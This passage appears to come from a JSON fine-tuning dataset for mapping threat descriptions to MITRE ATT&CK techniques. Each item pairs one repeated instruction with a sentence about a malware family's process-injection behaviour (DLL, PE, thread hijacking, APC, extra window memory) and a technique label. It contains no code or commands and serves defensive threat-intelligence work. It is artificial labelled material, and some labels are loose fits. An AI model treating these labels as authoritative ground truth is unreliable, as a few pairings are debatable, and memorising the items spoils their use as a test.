Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "NavRAT copies itself into a running Internet Explorer process to evade detection.", + "output": "- T1055: Process Injection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"Turla has also used PowerSploit's \"\"Invoke-ReflectivePEInjection.ps1\"\" to reflectively load a PowerShell payload into a random process on the victim system.\"", + "output": "- T1055: Process Injection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "WarzoneRAT has the ability to inject malicious DLLs into a specific process for privilege escalation.", + "output": "- T1055: Process Injection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "A Lazarus Group malware sample performs reflective DLL injection.", + "output": "- T1055.001: Process Injection - Dynamic-link Library Injection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Aria-body has the ability to inject itself into another process such as rundll32.exe and dllhost.exe.", + "output": "- T1055.001: Process Injection - Dynamic-link Library Injection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Carbon has a command to inject code into a process.", + "output": "- T1055.001: Process Injection - Dynamic-link Library Injection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Duqu will inject itself into different processes to evade detection. The selection of the target process is influenced by the security software that is installed on the system (Duqu will inject into different processes depending on which security suite is installed on the infected host).", + "output": "- T1055.001: Process Injection - Dynamic-link Library Injection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "During C0015, the threat actors used a DLL named `D8B3.dll` that was injected into the Winlogon process.", + "output": "- T1055.001: Process Injection - Dynamic-link Library Injection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Dyre injects into other processes to load modules.", + "output": "- T1055.001: Process Injection - Dynamic-link Library Injection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Elise injects DLL files into iexplore.exe.", + "output": "- T1055.001: Process Injection - Dynamic-link Library Injection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Emissary injects its DLL file into a newly spawned Internet Explorer process.", + "output": "- T1055.001: Process Injection - Dynamic-link Library Injection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Emotet has been observed injecting in to Explorer.exe and other processes.", + "output": "- T1055.001: Process Injection - Dynamic-link Library Injection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Gelsemium has the ability to inject DLLs into specific processes.", + "output": "- T1055.001: Process Injection - Dynamic-link Library Injection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Get2 has the ability to inject DLLs into processes.", + "output": "- T1055.001: Process Injection - Dynamic-link Library Injection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "If running in a Windows environment, Kazuar saves a DLL to disk that is injected into the explorer.exe process to execute the payload. Kazuar can also be configured to inject and execute within specific processes.", + "output": "- T1055.001: Process Injection - Dynamic-link Library Injection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Koadic can perform process injection by using a reflective DLL.", + "output": "- T1055.001: Process Injection - Dynamic-link Library Injection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Leviathan has utilized techniques like reflective DLL loading to write a DLL into memory and load a shell that provides backdoor access to the victim.", + "output": "- T1055.001: Process Injection - Dynamic-link Library Injection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Maze has injected the malware DLL into a target process.", + "output": "- T1055.001: Process Injection - Dynamic-link Library Injection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"MegaCortex loads \"\"injecthelper.dll\"\" into a newly created \"\"rundll32.exe\"\" process.\"", + "output": "- T1055.001: Process Injection - Dynamic-link Library Injection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Metamorfo has injected a malicious DLL into the Windows Media Player process (wmplayer.exe).", + "output": "- T1055.001: Process Injection - Dynamic-link Library Injection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Mongall can inject a DLL into `rundll32.exe` for execution.", + "output": "- T1055.001: Process Injection - Dynamic-link Library Injection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "PS1 can inject its payload DLL Into memory.", + "output": "- T1055.001: Process Injection - Dynamic-link Library Injection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "PoisonIvy can inject a malicious DLL into a process.", + "output": "- T1055.001: Process Injection - Dynamic-link Library Injection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Pupy can migrate into another process using reflective DLL injection.", + "output": "- T1055.001: Process Injection - Dynamic-link Library Injection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "RATANKBA performs a reflective DLL injection using a given pid.", + "output": "- T1055.001: Process Injection - Dynamic-link Library Injection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Remsec can perform DLL injection.", + "output": "- T1055.001: Process Injection - Dynamic-link Library Injection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Saint Bot has injected its DLL component into `EhStorAurhn.exe`.", + "output": "- T1055.001: Process Injection - Dynamic-link Library Injection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Socksbot creates a suspended svchost process and injects its DLL into it.", + "output": "- T1055.001: Process Injection - Dynamic-link Library Injection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"SombRAT can execute \"\"loadfromfile\"\", \"\"loadfromstorage\"\", and \"\"loadfrommem\"\" to inject a DLL from disk, storage, or memory respectively.\"", + "output": "- T1055.001: Process Injection - Dynamic-link Library Injection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Stuxnet injects an entire DLL into an existing, newly created, or preselected trusted process.", + "output": "- T1055.001: Process Injection - Dynamic-link Library Injection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Sykipot injects itself into running instances of outlook.exe, iexplore.exe, or firefox.exe.", + "output": "- T1055.001: Process Injection - Dynamic-link Library Injection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Taidoor can perform DLL loading.", + "output": "- T1055.001: Process Injection - Dynamic-link Library Injection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The Bumblebee loader can support the `Dij` command which gives it the ability to inject DLLs into the memory of other processes.", + "output": "- T1055.001: Process Injection - Dynamic-link Library Injection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The FunnyDream FilepakMonitor component can inject into the Bka.exe process using the `VirtualAllocEx`, `WriteProcessMemory` and `CreateRemoteThread` APIs to load the DLL component.", + "output": "- T1055.001: Process Injection - Dynamic-link Library Injection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The Netwalker DLL has been injected reflectively into the memory of a legitimate running process.", + "output": "- T1055.001: Process Injection - Dynamic-link Library Injection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Tropic Trooper has injected a DLL backdoor into dllhost.exe and svchost.exe.", + "output": "- T1055.001: Process Injection - Dynamic-link Library Injection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Turla has used Metasploit to perform reflective DLL injection in order to escalate privileges.", + "output": "- T1055.001: Process Injection - Dynamic-link Library Injection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Wizard Spider has injected malicious DLLs into memory with read, write, and execute permissions.", + "output": "- T1055.001: Process Injection - Dynamic-link Library Injection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "ZxShell is injected into a shared SVCHOST process.", + "output": "- T1055.001: Process Injection - Dynamic-link Library Injection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Carbanak downloads an executable and injects it directly into a new process.", + "output": "- T1055.002: Process Injection - Portable Executable Injection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "GreyEnergy has a module to inject a PE binary into a remote process.", + "output": "- T1055.002: Process Injection - Portable Executable Injection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Lizar can execute PE files in the address space of the specified process.", + "output": "- T1055.002: Process Injection - Portable Executable Injection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"Rocke's miner, \"\"TermsHost.exe\"\", evaded defenses by injecting itself into Windows processes, including Notepad.exe.\"", + "output": "- T1055.002: Process Injection - Portable Executable Injection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Zeus Panda checks processes on the system and if they meet the necessary requirements, it injects into that process.", + "output": "- T1055.002: Process Injection - Portable Executable Injection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Gazer performs thread execution hijacking to inject its orchestrator into a running thread from a remote process.", + "output": "- T1055.003: Process Injection - Thread Execution Hijacking" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"Trojan.Karagany can inject a suspended thread of its own process into a new process and initiate via the \"\"ResumeThread\"\" API.\"", + "output": "- T1055.003: Process Injection - Thread Execution Hijacking" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Waterbear can use thread injection to inject shellcode into the process of security software.", + "output": "- T1055.003: Process Injection - Thread Execution Hijacking" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "FIN8 has injected malicious code into a new svchost.exe process.", + "output": "- T1055.004: Process Injection - Asynchronous Procedure Call" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Saint Bot has written its payload into a newly-created `EhStorAuthn.exe` process using `ZwWriteVirtualMemory` and executed it using `NtQueueApcThread` and `ZwAlertResumeThread`.", + "output": "- T1055.004: Process Injection - Asynchronous Procedure Call" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Epic has overwritten the function pointer in the extra window memory of Explorer's Shell_TrayWnd in order to execute malicious code in the context of the explorer.exe process.", + "output": "- T1055.011: Process Injection - Extra Window Memory Injection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Power Loader overwrites Explorer\u2019s Shell_TrayWnd extra window memory to redirect execution to a NTDLL function that is abused to assemble and execute a return-oriented programming (ROP) chain and create a malicious thread within Explorer.exe.", + "output": "- T1055.011: Process Injection - Extra Window Memory Injection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": 